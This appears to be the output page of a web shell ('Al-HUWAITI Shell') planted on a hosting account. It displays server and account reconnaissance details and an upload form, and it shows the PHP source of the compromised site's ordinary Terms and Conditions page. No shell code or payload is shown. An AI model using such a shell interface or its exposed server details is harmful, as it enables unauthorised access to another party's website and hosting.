Al-HUWAITI Shell
Al-huwaiti


Server : LiteSpeed
System : Linux us-phx-web1202.main-hosting.eu 4.18.0-553.84.1.lve.el8.x86_64 #1 SMP Tue Nov 25 18:33:03 UTC 2025 x86_64
User : u615232177 ( 615232177)
PHP Version : 8.1.33
Disable Function : NONE
Directory :  /home/u615232177/domains/florencewaltersconsulting.com/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/u615232177/domains/florencewaltersconsulting.com/public_html/terms.php
<?php session_start();
$page_name = basename($_SERVER['PHP_SELF']);
$page_title = "Terms and Conditions";
$page_header = "terms_header.jpg";
include("header.php"); ?>
<title><?php echo $company_name; ?> - <?php echo $page_title; ?></title>
<?php include("page_header.php"); ?>

<!-- FAQ -->
<div class="faq mt-100">
    <div class="container my-5">
        <div class="row">
            <div class="col-lg-10 mx-auto">

                <h1 class="mb-4">Terms and Conditions</h1>
                <p class="text-muted">Last updated: <strong>February 2026</strong></p>

                <p>
                    Welcome to <strong><?= $company_name ?></strong> (“we,” “us,” or “our”). These Terms and Conditions (“Terms”)
                    govern your use of our website and services. By accessing or using our website or services, you agree to be
                    bound by these Terms. If you do not agree, please do not use our website or services.
                </p>

                <hr class="my-4">

                <h4>1. About Our Services</h4>
                <p>
                    We provide consulting, advisory, project support, and capacity-building services. Information on this website
                    is provided for general informational purposes only and does not constitute professional or legal advice unless
                    expressly stated in a written agreement.
                </p>

                <hr class="my-4">

                <h4>2. Use of the Website</h4>
                <ul>
                    <li>You agree to use this website only for lawful purposes.</li>
                    <li>You must not use the website in any way that could damage, disable, or impair it.</li>
                    <li>You must not attempt to gain unauthorized access to any part of the website or its systems.</li>
                    <li>We reserve the right to restrict or terminate access if these Terms are violated.</li>
                </ul>

                <hr class="my-4">

                <h4>3. Intellectual Property</h4>
                <p>
                    All content on this website, including text, graphics, logos, and materials, is the property of
                    <strong><?= $company_name ?></strong> or its licensors and is protected by applicable intellectual property laws.
                    You may not reproduce, distribute, or use any content without our prior written consent.
                </p>

                <hr class="my-4">

                <h4>4. Client Engagements</h4>
                <p>
                    Any consulting or professional services provided by us are governed by separate written agreements. These Terms
                    do not replace or override the terms of any signed contract between you and us.
                </p>

                <hr class="my-4">

                <h4>5. Disclaimer</h4>
                <p>
                    The website and its content are provided “as is” and “as available.” We make no warranties, express or implied,
                    regarding the accuracy, completeness, or reliability of the information on this website.
                </p>

                <hr class="my-4">

                <h4>6. Limitation of Liability</h4>
                <p>
                    To the maximum extent permitted by law, <strong><?= $company_name ?></strong> shall not be liable for any direct,
                    indirect, incidental, consequential, or special damages arising out of or in connection with your use of this
                    website or our services.
                </p>

                <hr class="my-4">

                <h4>7. Third-Party Links</h4>
                <p>
                    Our website may contain links to third-party websites. We are not responsible for the content, policies, or
                    practices of those websites, and accessing them is at your own risk.
                </p>

                <hr class="my-4">

                <h4>8. Privacy</h4>
                <p>
                    Your use of our website is also governed by our Privacy Policy, which explains how we collect and use personal
                    information. By using our website, you agree to the terms of our Privacy Policy.
                </p>

                <hr class="my-4">

                <h4>9. Changes to These Terms</h4>
                <p>
                    We may update these Terms from time to time. Any changes will be posted on this page with an updated “Last
                    updated” date. Your continued use of the website after changes are posted constitutes your acceptance of the
                    revised Terms.
                </p>

                <hr class="my-4">

                <h4>10. Governing Law</h4>
                <p>
                    These Terms shall be governed by and construed in accordance with the laws of <strong>Nigeria</strong>,
                    without regard to its conflict of law principles.
                </p>

                <hr class="my-4">

                <h4>11. Contact Us</h4>
                <p>
                    If you have any questions about these Terms and Conditions, please contact us at:
                </p>
                <p class="mb-0">
                    <strong><?= $company_name ?></strong><br>
                    Email: <a href=""><?= $company_email ?></a><br>

                </p>

            </div>
        </div>
    </div>

</div>
</main>
<br>
<?php include("footer.php"); ?>

Al-HUWAITI Shell